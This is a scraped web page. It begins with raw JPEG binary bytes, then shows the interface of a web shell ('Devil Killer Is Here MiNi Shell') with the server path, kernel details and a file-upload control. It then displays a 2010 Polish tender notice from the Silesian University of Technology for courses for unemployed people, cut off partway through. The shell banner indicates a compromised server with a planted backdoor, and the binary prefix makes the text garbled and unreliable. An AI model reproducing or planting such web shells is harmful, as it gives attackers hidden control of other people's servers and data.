JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100723/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100723/198029-N-2010.html

<p class="kh_header"><b>Gliwice: Kursy specjalistyczne  dla bezrobotnych. Oznaczenie sprawy: OZ/U/20/KP/10.</b><br>
<b>Numer ogłoszenia: 198029 - 2010; data zamieszczenia: 23.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Politechnika Śląska , ul. Akademicka 2A, 44-100 Gliwice, woj. śląskie, tel. (032) 237 13 34, 2371335, faks 0322371334, 2372255, 2372660.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.polsl.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kursy specjalistyczne  dla bezrobotnych. Oznaczenie sprawy: OZ/U/20/KP/10..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przeprowadzenie kursów specjalistycznych dla bezrobotnych, tj. kursów w zakresie spawania technikami MAG i TIG, kursów kierowców wózków jezdniowych z napędem silnikowym oraz kursów na prawo jazdy kategorii C. Przedmiot zamówienia podzielony został na 6 odrębnych zadań. Prowadzone kursy muszą obejmować wszystkie zagadnienia i czynności niezbędne do uzyskania kwalifikacji w zakresie objętym danym zadaniem. (CPV: 80.51.00.00-2 usługi szkolenia specjalistycznego).
Wartość niniejszego zamówienia przekracza 14.000 Euro i nie przekracza 193.000,00 Euro..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadanie wiedzy i doświadczenia - wykonanie przez Wykonawcę (zakończenie) nie wcześniej niż 3 lata przed upływem terminu składania ofert, co najmniej 1 usługi, obejmującej: 
a) w zakresie ZADANIA 1 - przeprowadzenie kursu spawacza technikami MAG i TIG;
b) w zakresie ZADANIA 2 - przeprowadzenie kursu spawacza technikami MAG i TIG;
c) w zakresie ZADANIA 3 - przeprowadzenie kursu kierowców wózków jezdniowych z napędem silnikowym w transporcie wewnątrzzakładowym;
d) w zakresie ZADANIA 4 - przeprowadzenie kursu kierowców wózków jezdniowych z napędem silnikowym w transporcie wewnątrzzakładowym;
e) w zakresie ZADANIA 5 - przeprowadzenie kursu na prawo jazdy kategorii C;
f) w zakresie ZADANIA 6 - przeprowadzenie kursu na prawo jazdy kategorii C.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowanie osobami zdolnymi do wykonania  zamówienia, które będą odpowiedzialne m.in. za prawidłową realizacją zamówienia i będą posiadały poniższe uprawnienia i kwalifikacje:
a) w zakresie ZADANIA 1:
- dysponowanie minimum 1 osobą  prowadzącą zajęcia teoretyczne posiadającą ukończony międzynarodowy kurs inżyniera spawalnictwa,
- dysponowanie minimum 1 osobą  prowadzącą zajęcia praktyczne posiadającą uprawnienia spawacza.

b) w zakresie ZADANIA 2:
- dysponowanie minimum 1 osobą  prowadzącą zajęcia teoretyczne posiadającą ukończony międzynarodowy kurs inżyniera spawalnictwa,
- dysponowanie minimum 1 osobą  prowadzącą zajęcia praktyczne posiadającą uprawnienia spawacza.

c) w zakresie ZADANIA 3: 
- dysponowanie minimum 1 osobą  prowadzącą zajęcia posiadającą kwalifikacje do prowadzenia szkolenia z zakresu wózków jezdniowych z napędem silnikowym.

d) w zakresie ZADANIA 4:
- dysponowanie minimum 1 osobą  prowadzącą zajęcia posiadającą kwalifikacje do prowadzenia szkolenia z zakresu wózków jezdniowych z napędem silnikowym.

e) w zakresie ZADANIA 5
- dysponowanie minimum 1 osobą  prowadzącą zajęcia praktyczne posiadającą obowiązujące uprawnienia instruktora nauki jazdy kat. C.

f) w zakresie ZADANIA 6
- dysponowanie minimum 1 osobą  prowadzącą zajęcia praktyczne posiadającą obowiązujące uprawnienia instruktora nauki jazdy kat. C.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Znajdowanie się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia - posiadanie przez Wykonawcę, obowiązującego na dzień, w którym upływa termin składania ofert, ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia tj. posiadanie opłaconej polisy lub innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony j.w.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1. Na potwierdzenie zaoferowania ceny, terminu realizacji itd. 1.1. Oferta Cenowa.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Pisemne zobowiązanie innych podmiotów lub inne dokumenty potwierdzające oddanie Wykonawcy do dyspozycji niezbędnych zasobów - jeżeli dotyczy. 2) Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentu, o których mowa w pkt. III 4.3.1 niniejszego ogłoszenia, zastępuje się go dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. 3)Dokumenty sporządzone w języku obcym powinny być złożone wraz z tłumaczeniem na język polski, za wyjątkiem dokumentów, których złożenie Zamawiający dopuścił w języku obcym. 4) Ww. dokumenty są składane w oryginale lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę (czytelny podpis upoważnionego przedstawiciela lub imienna pieczątka z parafą) 
tj. przez osoby reprezentujące Wykonawcę lub przez pełnomocnika upoważnionego do złożenia oferty w jego imieniu. Sposób reprezentacji musi być zgodny z właściwym wypisem z rejestru. W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia oraz w przypadku innych podmiotów (oddających Wykonawcy do dyspozycji niezbędne zasoby na okres korzystania z nich przez Wykonawcę przy wykonywaniu zamówienia) kopie dokumentów dotyczących odpowiednio Wykonawcy lub tych podmiotów powinny być poświadczone za zgodność z oryginałem przez Wykonawcę lub te podmioty.
5) W przypadku składania oświadczeń lub podpisywania jakichkolwiek dokumentów przez PEŁNOMOCNIKA wymagane jest dołączenie oryginału pełnomocnictwa z podpisem mocodawcy lub kopii uwierzytelnionej notarialnie. 6) Wykonawcy mogą wspólnie ubiegać się o udzielenia zamówienia. W tym przypadku Wykonawcy ustanawiają pełnomocnika (dotyczy np. spółki cywilnej, konsorcjum) do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Przepisy dotyczące Wykonawcy stosuje się odpowiednio do tych Wykonawców. Należy dołączyć do oferty stosowne pełnomocnictwo do reprezentowania podmiotów występujących wspólnie w postępowaniu o udzielenie zamówienia; pełnomocnictwo to powinno być udzielone (podpisane) przez  podmioty występujące wspólnie. Jeżeli oferta Wykonawców, występujących wspólnie zostanie wybrana, Zamawiający (przed zawarciem umowy) może żądać umowy regulującej ich współpracę. 7) Zamawiający nie wymaga, aby Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji zamówienia, przedkładał także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla Wykonawcy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Nie będą możliwe istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, za wyjątkiem następujących przypadków: 
1. zmiany terminu realizacji zamówienia ze względu na:
-   warunki atmosferyczne,
- przyczyny leżące po stronie Zamawiającego dotyczące np. braku przygotowania/ przekazania niezbędnych materiałów (logo, informacje o projekcie itp.)
-   inne niezawinione przyczyny spowodowane przez tzw. siłę wyższą np. pożar, zalanie itp. 
2. poprawy jakości lub innych parametrów charakterystycznych dla danego elementu dostawy lub zmiany technologii na równoważną lub lepszą, podniesienia wydajności urządzeń oraz bezpieczeństwa, w sytuacji wycofania z rynku przez producenta lub zakończenia produkcji zaoferowanego przez wykonawcę przedmiotu zamówienia, 
3. aktualizacji sposobu i zakresu prowadzonych kursów ze względu np. na zmiany obowiązujących przepisów, 
4. zmiany w kolejności i terminach realizacji zamówienia, zmiany w kolejności i terminach płatności (w tym płatności częściowe - jeżeli dotyczy) za realizację zamówienia w sytuacji, kiedy są one korzystne dla Zamawiającego,
5. zmiany kluczowego personelu Wykonawcy lub Zamawiającego (osoby upoważnione do reprezentowania stron w sprawach związanych z realizacją zamówienia),
6. zmiany podwykonawcy ze względów losowych lub innych korzystnych dla Zamawiającego - w przypadku zadeklarowania przez Wykonawcę realizacji zamówienia przy pomocy podwykonawców,
7. zmiany stawki podatku VAT (przy zachowaniu dotychczasowej wartości netto) w przypadku zmiany przepisów ustawy o podatku od towaru i usług i podatku akcyzowym, 
8. obniżenie ilości/wielkości przedmiotu zamówienia i tym samym wynagrodzenia Wykonawcy, wynikające z zaistnienia obiektywnych przesłanek konieczności takiej zmiany.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.polsl.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Politechnika Śląska, Dział Zamówień Publicznych i Zaopatrzenia, 44-100 Gliwice, ul. Konarskiego 18, pok. 511.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.08.2010 godzina 09:00, miejsce: Politechnika Śląska, Dział Zamówień Publicznych i Zaopatrzenia, 44-100 Gliwice, ul. Konarskiego 18, pok. 511.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiot zamówienia jest finansowany przez Europejski Fundusz Społeczny i realizowany zgodnie 
z umowami numer UDA-POKL.06.01.01-24-052/09-00 oraz UDA-POKL.06.01.01-24-057/09-00 
o dofinansowanie projektu: Z bezrobotnego pracownik oraz Z bezrobocia na etat w ramach Priorytetu VI Rynek pracy otwarty dla wszystkich. Działanie: 6.1. Poprawa dostępu do zatrudnienia oraz wspieranie aktywności zawodowej w regionie; Poddziałanie: 6.1.1. Wsparcie osób pozostających bez zatrudnienia na regionalnym rynku pracy..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Kurs spawacza technikami MAG i TIG (Gliwice).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przeszkolenie 20 osób bezrobotnych w ramach:
Kursu z zakresu spawania technikami MAG i TIG.
Celem kursu jest odpowiednie przygotowanie kursantów do egzaminu końcowego oraz do pracy w zawodzie spawacza.
Program kursu winien być opracowany w oparciu o rozporządzenie Ministra Edukacji i Nauki z dnia 3 lutego 2006r. sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz.U. 2006 nr 31 poz. 216), z wykorzystaniem standardów kwalifikacji zawodowy i modułowych programów szkoleń zawodowych, dostępnych w bazach danych prowadzonych przez ministra. Program szkolenia musi być oparty na wytycznych Instytutu Spawalnictwa.
Uczestnicy kursu będą posiadać ważne badania lekarskie umożliwiające uczestnictwo w kursie. Zamawiający przedstawi pisemnie listę uczestników kursu.
W ramach kursu powstaną dwie grupy, w każdej 10 osób. Pierwsza grupa zostanie przeszkolona w zakresie spawania techniką MAG, a druga grupa zostanie przeszkolona w zakresie spawania techniką TIG.
Wartość niniejszego zamówienia przekracza 14.000 Euro..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Kurs spawacza technikami MAG i TIG (Zawiercie).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przeszkolenie 30 osób bezrobotnych w ramach:
Kursu z zakresu spawania technikami MAG i TIG.
Celem kursu jest odpowiednie przygotowanie kursantów do egzaminu końcowego oraz do pracy w zawodzie spawacza.
Program kursu winien być opracowany w oparciu o rozporządzenie Ministra Edukacji i Nauki z dnia 3 lutego 2006r. sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz.U. 2006 nr 31 poz. 216), z wykorzystaniem standardów kwalifikacji zawodowy i modułowych programów szkoleń zawodowych, dostępnych w bazach danych prowadzonych przez ministra. Program szkolenia musi być oparty na wytycznych Instytutu Spawalnictwa.
Uczestnicy kursu będą posiadać ważne badania lekarskie umożliwiające uczestnictwo w kursie. Zamawiający przedstawi pisemnie listę uczestników kursu.
W ramach kursu powstaną trzy grupy, w każdej 10 osób. Pierwsza i druga grupa zostanie przeszkolona w zakresie spawania techniką MAG, a trzecia grupa zostanie przeszkolona w zakresie spawania techniką TIG.
Wartość niniejszego zamówienia przekracza 14.000 Euro..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Kurs kierowców wózków jezdniowych z napędem silnikowym w transporcie wewnątrzzakładowym (Gliwice).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przeszkolenie 30 osób bezrobotnych w ramach:
Kursu kierowców wózków jezdniowych z napędem silnikowym w transporcie wewnątrzzakładowym.
Celem kursu dla kierowców wózków jezdniowych z napędem silnikowym w transporcie wewnątrzzakładowym jest przygotowanie uczestników kursu do samodzielnej obsługi wózków jezdniowych w transporcie wewnątrzzakładowym oraz zdobycie odpowiedniego zakresu wiadomości i umiejętności niezbędnych do złożenia egzaminu kwalifikacyjnego przed komisją Urzędu Dozoru Technicznego i uzyskania uprawnień do obsługi wózków jezdniowych.
Program kursu winien być opracowany w oparciu o rozporządzenie Ministra Edukacji i Nauki z dnia 3 lutego 2006r. sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz.U. 2006 nr 31 poz. 216) oraz zgodnie z rozporządzeniem Ministra Gospodarki, Pracy i Polityki Społecznej w sprawie bezpieczeństwa i higieny pracy przy użytkowaniu wózków z napędem silnikowym z dnia 4 kwietnia 2003 r. (Dz. U. Nr 65, poz. 603) jak i z wykorzystaniem standardów kwalifikacji zawodowych i modułowych programów szkoleń zawodowych, dostępnych w bazach danych prowadzonych przez ministra. Szkolenie również musi być realizowane w oparciu o program zatwierdzony przez Urząd Dozoru Technicznego.
Uczestnicy kursu będą posiadać ważne badania lekarskie umożliwiające uczestnictwo w kursie. Szkolenie z obsługi wózków jezdniowych musi być prowadzone w 3 grupach po 10 osób w każdej z grup. Zamawiający przedstawi pisemnie listę uczestników kursu.
Wartość niniejszego zamówienia nie przekracza 14.000 Euro..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Kurs kierowców wózków jezdniowych z napędem silnikowym w transporcie wewnątrzzakładowym (Zawiercie).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przeszkolenie 60 osób bezrobotnych w ramach:
Kursu kierowców wózków jezdniowych z napędem silnikowym w transporcie wewnątrzzakładowym.
Celem kursu dla kierowców wózków jezdniowych z napędem silnikowym w transporcie wewnątrzzakładowym jest przygotowanie uczestników kursu do samodzielnej obsługi wózków jezdniowych w transporcie wewnątrzzakładowym oraz zdobycie odpowiedniego zakresu wiadomości i umiejętności niezbędnych do złożenia egzaminu kwalifikacyjnego przed komisją Urzędu Dozoru Technicznego i uzyskania uprawnień do obsługi wózków jezdniowych.
Program kursu winien być opracowany w oparciu o rozporządzenie Ministra Edukacji i Nauki z dnia 3 lutego 2006r. sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz.U. 2006 nr 31 poz. 216) oraz zgodnie z rozporządzeniem Ministra Gospodarki, Pracy i Polityki Społecznej w sprawie bezpieczeństwa i higieny pracy przy użytkowaniu wózków z napędem silnikowym z dnia 4 kwietnia 2003 r. (Dz. U. Nr 65, poz. 603) jak i z wykorzystaniem standardów kwalifikacji zawodowych i modułowych programów szkoleń zawodowych, dostępnych w bazach danych prowadzonych przez ministra. Szkolenie również musi być realizowane w oparciu o program zatwierdzony przez Urząd Dozoru Technicznego.
